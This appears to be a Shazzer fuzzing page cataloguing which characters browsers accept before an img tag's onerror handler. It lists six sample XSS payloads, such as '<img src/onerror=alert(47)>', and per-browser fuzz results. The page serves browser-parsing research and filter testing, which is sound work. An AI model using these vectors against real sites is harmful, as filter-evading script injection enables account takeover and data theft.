Shazzer logo
Login

Characters allowed before event handler

Chrome logo 6
Firefox logo 6
Edge logo 6
Safari logo 6

This XSS vector shows what characters can be used before the onerror event.

AyushXtha
Created byAyushXtha
Created Mar 12, 2026
Updated Mar 12, 2026

Tweet
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<img src$[chr]onerror=log($[i])>

Sample payloads

<img src0x09onerror=alert(9)>
<img src
onerror=alert(10)>
<img src0x0Conerror=alert(12)>
<img src0x0Donerror=alert(13)>
<img src onerror=alert(32)>
<img src/onerror=alert(47)>

Fuzz results

Chrome logo
Chrome 148.0.0.0 desktop Windows NT 10.0
Updated18 Mar 2026
Found 6 results
Loading...
Chrome logo
Chrome 145.0.0.0 desktop macOS 10.15.7older version
Updated12 Mar 2026
Found 6 results
Loading...
Firefox logo
Firefox 150.0 desktop macOS 10.15
Updated14 Mar 2026
Found 6 results
Loading...
Firefox logo
Firefox 148.0 desktop Windows NT 10.0older version
Updated13 Mar 2026
Found 6 results
Loading...
Edge logo
Microsoft Edge 146.0.0.0 desktop Windows NT 10.0
Updated21 Mar 2026
Found 6 results
Loading...
Safari logo
Safari 26.3 mobile iOS 18.7
Updated16 Mar 2026
Found 6 results
Loading...

Distributed Fuzzing

Enabled:
Status:disconnected
Your browser automatically contributes to distributed fuzzing when idle.